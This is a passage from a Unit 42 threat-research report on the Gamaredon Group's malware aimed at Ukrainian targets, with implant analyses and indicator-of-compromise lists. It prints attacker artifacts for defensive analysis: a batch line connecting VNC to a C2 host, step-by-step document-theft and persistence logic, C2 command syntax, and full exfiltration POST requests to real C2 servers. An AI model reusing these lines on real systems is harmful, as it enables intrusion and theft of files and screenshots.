{ "id": "615654d9-a14a-48a8-b65f-05d73a2e63f8", "created_at": "2026-04-06T00:21:50.344371Z", "updated_at": "2026-04-10T13:11:35.561944Z", "deleted_at": null, "sha1_hash": "d870eee1c89b358082b38b2dcc4850e137ca1d83", "title": "The Gamaredon Group Toolset Evolution", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1020148, "plain_text": "The Gamaredon Group Toolset Evolution\r\nBy Anthony Kasza, Dominik Reichel\r\nPublished: 2017-02-27 · Archived: 2026-04-02 12:40:44 UTC\r\nUnit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have\r\nlabelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at\r\nleast 2013.\r\nIn the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group\r\nhave made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their\r\ntechnical capabilities. The custom-developed malware is fully featured an includes these capabilities:\r\nA mechanism for downloading and executing additional payloads of their choice\r\nThe ability to scan system drives for specific file types\r\nThe ability to capture screenshots\r\nThe ability to remotely execute commands on the system in the user’s security context\r\nThe Gamaredon Group primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian\r\ncountry code top-level domains (ccTLDs), and Russian hosting providers to distribute their custom-built malware.\r\nAntimalware technologies have a poor record of detecting the malware this group has developed. We believe this is likely\r\ndue to the modular nature of the malware, the malware’s heavy use of batch scripts, and the abuse of legitimate applications\r\nand tools (such as wget) for malicious purposes.\r\nPreviously, LookingGlass reported on a campaign they named \"Operation Armageddon,\" targeting individuals involved in\r\nthe Ukrainian military and national security establishment. Because we believe this group is behind that campaign, we’ve\r\nnamed them the Gamaredon Group, an anagram of “Armageddon”. At this time, it is unknown if the new payloads this\r\ngroup is distributing is a continuation of Operation Armageddon or a new campaign.\r\nGamaredon: Historical Tool Analysis\r\nThe earliest discovered sample (based on compile times and sandbox submission times) distributed by this threat group\r\nresembles the descriptions of Gamaredon provided by Symantec and Trend Micro. Unfortunately, this identification is rather\r\ntenuous, as it seems to only identify the first variant of payloads used by our threat actors. Some samples of later payload\r\nvariants also have been given the generic and brittle names of TROJ_RESETTER.BB and TROJ_FRAUDROP.EX.\r\nOriginally, the payloads delivered to targets by this threat group consisted of a password protected Self-extracting Zip-archive (.SFX) file which, when extracted, wrote a batch script to disk and installed a legitimate remote administration tool\r\ncalled tool Remote Manipulator System (Figure 1) which they would abuse for malicious purposes.\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 1 of 17\n\nFigure 1 Remote Manipulator System Interface\r\nOne such self-extracting archive (ca87eb1a21c6d4ffd782b225b178ba65463f73de6f4c736eb135be5864f556dc) was first\r\nobserved around April of 2014.  The password (reused by many of the password protected SFX payloads) it used to extract\r\nitself is “1234567890__”. The files included in this SFX file we observed include a batch file named “123.cmd” and another\r\nSFX named “setting.exe”. This second SFX contains a .MSI installer package which installs Remote Manipulator System\r\nand a batch script which handles the installation.\r\nLater payloads would write batch scripts to disk as well as wget binaries. The batch scripts would use the wget binaries to\r\ndownload and execute additional executables. The scripts would also use wget to send POST requests to command and\r\ncontrol (C2) servers that would contain information about the compromised system. Some of these payloads included decoy\r\ndocuments that would open when the malware is executed.\r\nThree examples of this type of payload include:\r\na6a44ee854c846f31d15b0ca2d6001fb0bdddc85f17e2e56abb2fa9373e8cfe7\r\nb5199a302f053e5e9cb7e82cc1e502b5edbf04699c2839acb514592f2eeabb13\r\n3ef3a06605b462ea31b821eb76b1ea0fdf664e17d010c1d5e57284632f339d4b\r\nWe first observed these samples using wget in 2014. The filenames and decoy documents these samples used attempt to lure\r\nindividuals by using the presidential administration of Ukraine, Ukrainian national security and defense, the Anti-Terrorist\r\nOperation Zone in the Ukraine, and Ukrainian patriotism as subjects. The text of one such decoy document is pictured\r\nbelow.\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 2 of 17\n\nFigure 2 Ukrainian Decoy Document used by Gamaredon Group\r\nOther observed payloads would, again, use SFX files to deliver a batch script and an executable that allowed remote access\r\nthrough the VNC protocol. These VNC exectuables would either be included in the SFX file or downloaded by the batch\r\nscript. We found one URL (now taken down) that hosted a VNC executable that the malware would attempt to download\r\nand install at hxxp://prestigeclub.frantov.com[.]ua/press-center/press/chrome-xvnc-v5517.exe.\r\nThe batch script would then attempt to have the VNC program connect to a command and control (C2) server to enable the\r\nserver to control the compromised system. All VNC installations on compromised systems that we observed have used the\r\nsame configuration file, RC4 key file, and passwords.\r\nOne such sample, cfb8216be1a50aa3d425072942ff70f92102d4f4b155ab2cf1e7059244b99d31 first appeared around January\r\nof 2015. The batch script utilized in this sample ensures a VNC connection is available:\r\nstart winlogons -autoreconnect -id:%sP% -connect grom56.ddns.net:5500\r\nThe path configured in the VNC configuration file across all implants employing VNC (UltraVNC.ini) is\r\n“Y:\\ПРОБА\\Создание троянов\\создание RMS\\vnc”. This isn’t the only place hardcoded Cyrillic file paths are used by\r\nimplants. Many of the batch scripts also use hardcoded paths such as “Главное меню\\Программы\\Автозагрузка”. Many\r\npayloads also include a VBS script which raises a dialog box to the users asking them to run the malware again. It reads,\r\n“Ошибка при инициализации приложения (0xc0000005). Повторить попытку открытия файла?” (English Translation\r\nfrom Russian: Application failed to initialize (0xc0000005). Try to open the file again?).\r\nSome of the SFX files also include another legitimate application called ChkFlsh.exe\r\n(8c9d690e765c7656152ad980edd2200b81d2afceef882ed81287fe212249f845). This application was written by a Ukrainian\r\nprogrammer and is used to check performance of USB flash drives. Its value to the attackers to the attackers isn’t clear but\r\none possibility is that it is somehow used to steal or monitor files on USB devices. In our research, we found this application\r\npresent in some SFX files along with VNC programs and in some SFX files that didn’t have VNC programs included.\r\nCustom Implants\r\nWhile the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from\r\napplications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. Instead of using wget the attackers are distributing\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 3 of 17\n\ncustom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed\r\nremote access implant.\r\nIn June of 2015 a custom downloader used by many newer samples was first seen in the wild and is often included in SFX\r\nimplants with the name “LocalSMS.dll”. This downloader makes requests to adobe.update-service[.]net (hardcoded in the\r\nsample) and is further discussed in Appendix A.\r\nIn February 2016, another custom tool now often included in SFX implants was seen in the wild. This SFX file\r\n(3773ddd462b01f9272656f3150f2c3de19e77199cf5fac1f44287d11593614f9) contains a new Trojan\r\n(598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824) we refer to as “Pteranodon.” Pteranodon is a\r\ncustom backdoor which is capable of the following tasks:\r\nCapturing screenshots at a configurable interval and uploading them to the attacker\r\nDownloading and executing additional files\r\nExecuting arbitrary commands on the system\r\nThe earliest version of Pteranodon uses a hardcoded URL for command and control. It sends POST requests to\r\n“msrestore[.]ru/post.php” using a static multipart boundary:\r\n------------870978B0uNd4Ry_$\r\nNewer versions of the tool also use hardcoded domains and multipart boundaries. They also share similar pdb strings. Other\r\nPteranodon samples can be found in AutoFocus using the Pteranodon tag. The most recent variant of Pteranodon is analyzed\r\nin Appendix A.\r\nWe have only identified one delivery vector for the new implants thus far. A Javascript file\r\n(f2355a66af99db5f856ebfcfeb2b9e67e5e83fff9b04cdc09ac0fabb4af556bd) first seen in December of 2016 downloads a\r\nresource from http://samotsvety.com[.]ua/files/index.pht (likely a compromised site used for staging payloads) which\r\npreviously an SFX file (b2fb7d2977f42698ea92d1576fdd4da7ad7bb34f52a63e4066f158a4b1ffb875) containing two of the\r\nGamaredon custom tools.\r\nA related sample (e24715900aa5c9de807b0c8f6ba8015683af26c42c66f94bee38e50a34e034c4) used the same distinct\r\nMutex and contains a larger set of tools for analysis. The original name of the file is \"AdapterTroubleshooter.exe\" and the\r\nfile uses icons which resemble those used by OpenVPN, as seen below.\r\nUpon examining the sample's file activity within AutoFocus it is clear the sample is a self-extracting executable.\r\nFigure 3 Self Extracting executable behavior shown in AutoFocus\r\nOpening the sample with 7zip inside of a virtual machine, all the files contents can be examined. Below is a table providing\r\nthe SHA256 values, the filenames, the compile timestamps and the pdb paths of the contents of the SFX file.\r\nSHA256 Filename\r\nCompile\r\nTime\r\nPDB Path\r\n400f53a89d08d47f608e1288d9873bf8d421fc7cd642c5e821674f38e07a1501 LocalSMS.dll\r\nWed Apr\r\n29\r\n08:10:30\r\n2015\r\nc:\\users\\viber\\documents\\vi\r\n2013\\projects\\contextmenu\\\r\nd01df47b6187631c9a93bdad1298439ab1a1c5529b3319f3614b6ec2455e5726 MpClients.dll\r\nThu Sep\r\n08\r\n05:01:00\r\n2016\r\nc:\\users\\user\\documents\\vis\r\n2015\\projects\\updaterv1\\rel\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 4 of 17\n\nf2296bcb6be68dfb330baec2091fb11a42a51928ba057164213580e6ff0e1126 OfficeUpdate.dll\r\nWed\r\nDec 07\r\n09:25:57\r\n2016\r\n-\r\n2ded2f3b5b5b6155ce818893c67887cbfa8b539be6c983e314ccf2177552da20 SmartArtGraphicsLog.lnk - -\r\n46a39da996b01e26ddd71d51c9704de2aa641cd3443f6fe0e5c485f1cd9fa65d UsrClass.lnk - -\r\na972ad0ddc00d5c04d9fe26f1748e12008efdd6524c9d2ea4e6c2d3e42d82b7b condirs.cmd - -\r\n37c78ee7826d63bb9219de594ed6693f18da5db60e3cbc86795bd10b296f12ac winrestore.dll\r\nMon Jan\r\n09\r\n03:12:39\r\n2017\r\nc:\\develop\\ready\\winrestore\r\nproxy\\release\\winrestore.pd\r\n90ba0f95896736b799f8651ef0600d4fa85c6c3e056e54eab5bb216327912edd wmphost.exe\r\nThu Dec\r\n01\r\n08:23:32\r\n2016\r\nc:\\develop\\ready\\mouse-mo\r\nmove\\release\\mouse-move.p\r\nThe bootstrapping logic for the sample relies on the contents of \"condirs.cmd\". Briefly, the logic within \"condirs.cmd\"\r\nfollows:\r\n1. Ensure \"%LOCALAPPDATA%\\Microsoft\\Windows\\\" exists\r\n2. Kill and delete processes, files, and scheduled tasks which may interfere with the sample executing\r\n3. Copy \"winrestore.dll\" to \"%LOCALAPPDATA%\\Microsoft\\Windows\\UsrClass.dat{4f6fe187-7034-11de-b675-\r\n001d09fa5win}.dll\"\r\n4. Copy \"OfficeUpdate.dll\" to \"%LOCALAPPDATA%\\Microsoft\\Windows\\UsrClass.dat{4f6fe187-7034-11de-b675-\r\n001d09fa5off}.dll\"\r\n5. Determine if the operating system is Windows XP or Windows 7\r\n6. If the system is running Windows XP\r\na. Set the directory to copy files into as \"%WINDIR%\\Setup\\State\\Office\"\r\nb. Copy \"UsrClass.lnk\" to \"%USERPROFILE%\\Главное меню\\Программы\\Автозагрузка\\\"\r\nc. Copy \"SmartArtGraphicsLog.lnk\" to \"%USERPROFILE%\\Главное меню\\Программы\\Автозагрузка\\\"\r\n7. If the system is running Windows 7\r\na. Set the directory to copy files into as \"%APPDATA%\\Microsoft\\Office\"\r\nb. Copy \"UsrClass.lnk\" to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\r\nc. Copy \"SmartArtGraphicsLog.lnk\" to \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\"\r\nFigure 4 Windows XP and Windows 7 logic within \"condirs.cmd\"\r\n8. Copy \"winrestore.dll\" to the directory set in step 6 or 7a with the filename \"MSO1234.win\"\r\n9. copy \"LocalSMS.dll\" to the directory set in step 6 or 7a with the filename \"MSO1567.dls\"\r\n10. copy \"OfficeUpdate.dll\" to the directory set in step 6 or 7a with the filename \"MSO5678.usb\"\r\n11. copy \"MpClients.dll\" to the directory set in step 6 or 7a with the filename \"MSO8734.obn\"\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 5 of 17\n\n12. Execute the exported function \"updater\" within \"MSO1234.win\" using rundll32.exe\r\n13. Execute the exported function \"EntryPoint\" within \"MSO1567.dls\" using rundll32.exe\r\nIt should be noted that \"UsrClass.lnk\" links to \"%WINDIR%\\system32\\rundll32.exe UsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5win}.dll,updater\" and \"SmartArtGraphicsLog.lnk\" links to \"C:\\WINDOWS\\system32\\rundll32.exe\r\nUsrClass.dat{4f6fe187-7034-11de-b675-001d09fa5off}.dll,StartBackup\". These are the locations \"winrestore.dll\" and\r\n\"OfficeUpdate.dll\" were copied to in steps 3 and 4, respectively.\r\nThe \"condirs.cmd\" script then continues to:\r\n1. Schedule the following tasks:\r\na. Task name \"UpdatesWinRes\", invoke \"MSO1234.win,updater\"\r\nb. Task name \"UpdatesWinDLL\", invoke \"MSO1567.dls,EntryPoint\"\r\nc. Task name \"UpdatesWinUSBOOK\", invoke \"MSO5678.usb,StartBackup\"\r\nd. Task name \"UpdatesWinOBN\", invoke \"MSO8734.obn,bitDefender\"\r\n2. Ensure the directory \"%Temp%\\reports\\ProfileSkype\\\" exists\r\n3. Kill processes named \"skype.exe\"\r\n4. Copy the contents of \"%AppData%\\Skype\" to \"%Temp%\\reports\\ProfileSkype\\\"\r\n5. Create subdirectories under \"%Temp%\\reports\\%COMPUTERNAME\\\" with names: Z W P S V Q N M L K I J F H E G\r\nand D. These are drive letters.\r\n6. Copy all files from all above drive letters with extensions \"doc\", \"docx\",  \"xls\",  \"xlsx\", \"rtf\" \"odt\" and \"txt\" into\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\%%d\\\" where %%d is the drive letter\r\n7. Copy all files with the above extensions from all users' \"Desktop\", \"Documents\", and \"Downloads\" folders to\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\Desktop\\\", \"%TEMP%\\reports\\%COMPUTERNAME%\\Documents\\\" and\r\n\"%TEMP%\\reports\\%COMPUTERNAME%\\Downloads\\\" respectively\r\nFigure 5 The document stealing logic inside \"condirs.cmd\"\r\n8. Execute the exported function \"StartBackup\" within \"MSO5678.usb\" using rundll32.exe\r\n9. Execute the exported function \"bitDefender\" within \"MSO8734.obn\" using rundll32.exe\r\n10. Clean up temporary files, sleep, and delete itself\r\nWhen this script has completed, a series of implants giving the attacker the ability to steal files, capture screenshots and\r\nevade detection are deployed on the system. These individual implants are analyzed in detail in Appendix A.\r\nTrends Across Implants\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 6 of 17\n\nWhile the payloads used to control compromised systems have evolved over time, many commonalities appear across the\r\nsamples. While not every sample distributed by this group is described in this blog, hashes of the known samples are\r\nincluded in the Indicators of Compromise section. Some interesting behaviors from a few of the related samples include:\r\nMany of the batch scripts include misspellings of common English words. One such example is the filename \"cmd\".\r\nWhile another example, \"domen\", is used as a variable name in a batch script which is likely meant to be \"domain\"\r\nAlmost all batch scripts in all samples ping localhost as a means of sleeping\r\nMany of the batch scripts are named \"cmd\" and some include the string \"Trons_ups\" and \"Treams\"\r\nMany of the batch scripts use the same commands for determining operating system version.\r\nMany of the early samples used applications such as wget, UltraVNC, and ChkFlash. These utilities have been\r\nreplaced with custom tools in the latest sample\r\nSamples employing VNC used the same configuration and passwords\r\nAdditionally, the infrastructure used by this group has not changed much in the past three years. Many of the samples reused\r\nthe same domains for implant communication. Also, many of the custom developed tools use hardcoded network locations.\r\nMonikers used for filenames, exported DLL functions, domains, and variable names in scripts seem to be themed and\r\nconsistent. By pivoting on indicators from one of the SFX implants within AutoFocus additional samples are easily\r\nidentified by overlaps in these consistencies. Most samples were delivered in a similar fashion: an SFX dropping resources\r\nwhich are staged and loaded with a batch and/or VBS script. The reuse of SSL certificates between IPv4 addresses as well as\r\nthe reuse of IPv4 addresses between domains names is apparent when viewing a large collection of entities involved in this\r\ncampaign, as shown below.\r\nFocusing in on one of the newest samples (analyzed in Appendix A), the reuse of file names as well as SFX content files\r\nbecomes apparent.\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 7 of 17\n\nFigure 6 Overview of the relationships between Samples and Network Infrastructure used by the Gamaredon Group\r\nFinal Word\r\nThe implants identified have limited, generic, and often conflicting detections on VirusTotal. The threat group using these\r\nimplants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian\r\ngovernment. Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few\r\nantivirus vendors as Gamaredon. However, newer variants deliver more advanced malware which goes unnamed.\r\nPeriodically, researchers at Palo Alto Networks hunt through WildFire execution reports, using AutoFocus, to identify\r\nuntagged samples' artifacts in the hopes of identifying previously undiscovered malware families, behaviors, and campaigns.\r\nThis blog presents a threat group identified by the above process using AutoFocus. By actively hunting for malicious\r\nactivity and files instead of waiting for alerts to triage, defenders can identify and building protections for new trends before\r\nthey arrive on their corporate networks and endpoints. More details about this threat group can be found in the AutoFocus\r\ntag GamaredonGroup.\r\nPalo Alto Networks customers are protected from this threat in the following ways:\r\nWildFire identifies the malware described in this report as malicious.\r\nTraps prevents execution of the malware described in this report.\r\nThe C2 domains used by this group are blocked through Threat Prevention.\r\nSpecial thanks go out to Tom Lancaster for both his assistance in this investigation and for his charming good looks.\r\nAppendix A: Custom Implant Analyses\r\nUSBStealer: MSO5678.usb / OfficeUpdate.dll\r\nThis file is a USB file stealer which can be also guessed by its internal name \"USBgrabber.dll\". However, the\r\nimplementation is sloppy which makes it a file stealer for any newly connected logical volume on a system. This is because\r\nthe malware monitors the computer for messages WM_COMMAND and WM_DEVICECHANGE, but not verifying if a\r\nUSB drive was connected.\r\nThe malware creates two mutexes \"__Wsnusb73__\" and \"__Wsnusbtt73__\". Then, it creates the following folder in the\r\ntemp path of the local user:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\reports\"\r\nThis folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the\r\nC2 server. The files are transferred to the hardcoded C2 server \"195.62.52.93\" one by one via HTTP POST method. The\r\nfollowing request is used which also includes information about the victim, the file to be transferred as well as the source\r\ndrive:\r\n1\r\n2\r\n3\r\nPOST /post.php HTTP/1.1\r\nContent-Type: multipart/form-data; boundary=----qwerty\r\nHost: 195.62.52.93\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 8 of 17\n\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\nContent-Length: ...\r\nCache-Control: no-cache\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filename\"\r\n\\\\\u003cfilename\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filedate\"\r\n\u003cmonth\u003e/\u003cday\u003e/\u003cyear\u003e \u003chour\u003e:\u003cseconds\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"compname\"\r\n\u003cComputerName\u003e||\u003cUsername\u003e||\u003cUserHWGUID\u003e||\u003cC_VolumeSerialNumber\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"serial\"\r\n\u003cSerialNumberOfDriveToStealFrom\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"w\"\r\n\"?\"\r\n------qwerty\r\nContent-Disposition: form-data; name=\"filesize\"\r\n\u003cFileSize\u003e\r\n------qwerty\r\nContent-Disposition: form-data; name=\"file\"; filename=\"\u003cAbsoluteFilePathInTemporaryLocation\u003e\"\r\nContent-Type: application/octet-stream\r\nContent-Transfer-Encoding: binary\r\n...File data...\r\n------qwerty--\r\nThe malware also creates a SQLite database named \"asha.dat\" in the local users temp folder. Therein, it keeps track of files\r\nwhich were stolen by calculating the MD5 hash of the filename followed by the file length. Therefore, it creates a Unicode\r\nstring of the original file path from the drive and concatenates the file size in bytes to it. Finally, it uses the API functions\r\nMD5Init(), MD5Update() and MD5Final() to calculate the hash and store it in the database.\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 9 of 17\n\nFigure 7 Structure of the database created by the malware\r\nIt should be noted, that only hashes of files are added to the database that don't have the following extensions:\r\nDLL\r\nBIN\r\nCAB\r\nEXE\r\nISO\r\nDownloader: MSO1567.dls / LocalSMS.dll\r\nThis file is essentially a simple downloader which contacts the C2 server to send some user data and get an executable as\r\nresponse which will be executed. The DLL is written in C++ and contains all of the functionality is in an export function\r\nnamed \"EntryPoint\". The file was compiled without any compiler or linker optimizations, thus the big file size and the\r\nremaining PDB path string.\r\nAt first, the malware retrieves the temp path of the local user (\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\\"), the\r\ncomputer name (e.g. \"WIN-MLABCSUOVJB\"), the hardware profile GUID (e.g. \"{826ee360-7139-11de-8d20-\r\n808e6f6e6263}\") and the volume serial number of C:\\ drive (e.g. \"1956047236\"). Next, it takes the following hardcoded\r\nstring:\r\nhttp://adobe.update-service[.]net/index.php?comp=\r\nTo create a URL string with the victims information for contacting the C2 server:\r\nhttp://adobe.update-service[.]net/index.php?comp=WIN-MLABCSUOVJB\u0026id=WIN-MLABCSUOVJB_{826ee360-\r\n7139-11de-8d20-808e6f6e6263}1956047236\r\nTo create the filename where the downloaded file will be saved, the malware tries to build a random string of 10 characters.\r\nHowever, due to an implementation error the string always ends up being the same, namely \"frAQBc8Wsa\". This string gets\r\nconcatenated with the retrieved local users temp path to the following file path:\r\nC:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\frAQBc8Wsa\r\nThen, it uses the API function URLDownloadToFileA() to download a payload to disk and executes it via CreateProcess().\r\nFinally, it sleeps for 60 seconds before terminating the payload and the DLL exits.\r\nDownloader: MSO8734.obn / MpClients.dll\r\nThis file is a slightly more advanced version of LocalSMS.dll downloader. Instead of downloading a payload directly to\r\ndisk, this file requests a download command from the C2 server which contains the actual payload URL to be used.\r\nTherefore, it uses a basic network implementation based on the Winsock functions. All the functionality of this DLL is put\r\ninto an export function named \"bitDefender\".\r\nIt creates a socket, requests the address of the hardcoded C2 server \"win-restore.ru\" via gethostbyname() and connects to it.\r\nThereafter, it also collects the volume serial number of C:\\ drive, the computer name and the hardware profile GUID. With\r\nthis information, it creates the following string used by a subsequent send() function call:\r\n\"GET /css.php?id=WIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236 HTTP/1.1\r\nHost: win-restore.ru\r\nConnection: close\"\r\nThe response will be stored into a memory buffer via recv() and scanned for the string \"urltoload={\". As the name suggests,\r\nthe received data contains the actual URL of the payload inside curly brackets. The URL gets pulled out of the string and is\r\nused again as input for the API function URLDownloadToFile(). Again, the same file path will be used to store the payload\r\non disk and execute it:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Local\\Temp\\frAQBc8Wsa\"\r\nPteranodon: MSO1234.win / winrestore.dll\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 10 of 17\n\nPteranodon is a backdoor which also can capture screenshots based on a configuration file created on the disk. Further, it\r\nuploads the screenshots to the C2 server unencrypted. All the functionality of this DLL is put into an export function named\r\n\"updater\".\r\nAt first, it retrieves the %APPDATA% folder of the local user to build the following file path:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Roaming\\Microsoft\\desktop.ini\"\r\nThen, it checks if the file already exists and continues execution if so. If not, it runs a routine which checks if there is mouse\r\nmovement as an anti-sandbox technique. If no mouse movement is detected the malware runs in an infinite loop checking\r\nfor mouse movement.\r\nIf the file \"desktop.ini\" does not exist, the malware creates it and writes the following information into it:\r\n\" interval={60} msfolder={10} status={0}\"\r\nThis information is used as configuration data to create the screenshots. There are also other commands possible which can\r\nbe retrieved from the C2 server. The following commands are available:\r\nexec={\r\nThis command is used to download and execute a payload from a URL present in the curly brackets. It creates a random file\r\npath in temp folder, calls URLDownloadToFile() and CreateProcess() to run the payload. Then, it waits 30s and terminates\r\nthe payload.\r\ninterval={\r\nThis command is used to define the interval in seconds between the creation of two or more screenshots.\r\nmsfolder={\r\nThis command defines the number of screenshots to create.\r\ncommand={ / command_c={\r\nThis command is used to execute a file present as a string between the curly brackets. The variant with the \"c\" uses the\r\nWindows tool cmd.exe with help of ShellExecute().\r\nstatus={\r\nThis command contains the flag which defines if screenshots should be made (\"1\") or not (\"0\").\r\nNext, it checks for a mutex named \"asassin1dj\" to verify if the system is already infected and creates it if this isn't the case:\r\nFigure 8 Mutex check and creation routine\r\nNext, it creates the following folder, if not already present:\r\n\"C:\\Users\\\u003cUsername\u003e\\AppData\\Roaming\\Microsoft\\store\"\r\nNext, according to the configuration data in \"desktop.ini\" it constantly creates 24-bit color depth JPEG screenshots without\r\nextension in the store folder with help of GDI32 and gdiplus API functions. The following file naming scheme for the\r\nscreenshots is used:\r\n\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\r\nAfter the last screenshot was created, it uploads all files from the \"store\" folder to the C2 server \"win-restore[.]ru\". Then, it\r\ndeletes all the files present in the folder and starts a new screenshot creation cycle. It should be noted that there is no check\r\nof what files are uploaded. The files are uploaded via POST HTTP method to the script \"vvd.php\". For this, the following\r\nHTTP request is used which contains also data from the victim as well the JPEG files:\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 11 of 17\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nPOST /vvd.php HTTP/1.1\r\nAccept: application/x-www-form-urlencoded\r\nConnection: Keep-Alive\r\nContent-Type: multipart/form-data; boundary=----------987978B0urd3Gf_$\r\nAccept-Charset: utf-8\r\nUser-Agent: asasing\r\nHost: win-restore.ru\r\nContent-Length: \u003clength\u003e\r\nCache-Control: no-cache\r\n------------987978B0urd3Gf_$\r\nContent-Type: text/html\r\nContent-Disposition: form-data; name=\"uuid\"\r\nWIN-MLABCSUOVJB_{826ee360-7139-11de-8d20-808e6f6e6263}1956047236\r\n------------987978B0urd3Gf_$\r\nContent-Type: application/octet-stream\r\nContent-Disposition: form-data; name=\"file0\"; filename=\"\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\"\r\nContent-Transfer-Encoding: 8bit\r\n...JPEG file...\r\n------------987978B0urd3Gf_$\r\nContent-Type: application/octet-stream\r\nContent-Disposition: form-data; name=\"file1\"; filename=\"\u003cyear\u003e\u003cmonth\u003e\u003cday\u003e_\u003chour\u003e\u003cminute\u003e\u003cseconds\u003e\"\r\nContent-Transfer-Encoding: 8bit\r\n...JPEG file...\r\n...\r\n------------987978B0urd3Gf_$\r\nFinally, it checks if any new command information is available from the C2 server and updates the \"desktop.ini\" file\r\naccording to it. Based on functionality, compile timestamps, and binary differencing this malware is likely an updated\r\nversion of 598c55b89e819b23eac34547ad02e5cd59e1b8fcb23b5063a251d8e8fae8b824.\r\nwmphost.exe\r\nThis file runs an infinite loop until mouse movement gets detected, then it exits. This file can be used to circumvent\r\nsandboxes that don't simulate mouse movement. To detect if it's running inside a sandbox, another file can scan the list of\r\nrunning processes to see if \"wmphost.exe\" is present or not.\r\nAppendix B: Indicators of Compromise\r\nDomain Names\r\nadmin-ru[.]ru\r\nadobe.update-service[.]net\r\napploadapp.webhop[.]me\r\nbrokbridge[.]com\r\ncat.gotdns[.]ch\r\nhttp://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution\r\nPage 12 of 17\n\ncheck-update[.]ru\r\nchildrights.in[.]ua\r\nconhost.myftp[.]org\r\ndocdownload.ddns[.]net\r\ndownloads.email-attachments[.]ru\r\ndownloads.file-attachments[.]ru\r\ndyndownload.serveirc[.]com\r\ne.muravej[.]ua\r\nemail-attachments[.]ru\r\nfile-attachments[.]ru\r\nfreefiles.myftp[.]biz\r\ngetmyfile.webhop[.]me\r\ngooglefiles.serveftp[.]com\r\ngrom56.ddns[.]net\r\ngrom90.ddns[.]net\r\nhrome-update[.]ru\r\nhrome-updater[.]ru\r\nloaderskypetm.webhop[.]me\r\nloadsoulip.serveftp[.]com\r\nmail.file-attachments[.]ru\r\nmails.redirectme[.]net\r\nmars-ru[.]ru\r\nmsrestore[.]ru\r\noficialsite.webhop[.]me\r\nparkingdoma.webhop[.]me\r\npoligjong.webhop[.]me\r\npolistar.ddns[.]net\r\nproxy-spread[.]ru\r\nrms.admin-ru[.]ru\r\nsamotsvety.com[.]ua\r\nskypeemocache[.]ru\r\nskypeupdate[.]ru\r\nspbpool.ddns[.]net\r\nspread-service[.]ru\r\nspread-ss[.]ru\r\nspread-updates[.]ru\r\nstor.tainfo.com[.]ua\r\ntortilla.sytes[.]net\r\nukrnet.serveftp[.]com\r\nukrway.galaktion[.]ru\r\numachka[.]ua\r\nupdate-service[.]net\r\nupdatesp.ddns[.]net\r\nupdateviber.sytes[.]net\r\nwebclidie.webhop[.]me\r\nwin-restore[.]ru\r\nwinloaded.sytes[.]net\r\nwinupdateloader[.]ru\r\nwww.file-attachments[.]ru\r\nwww.win-restore[.]r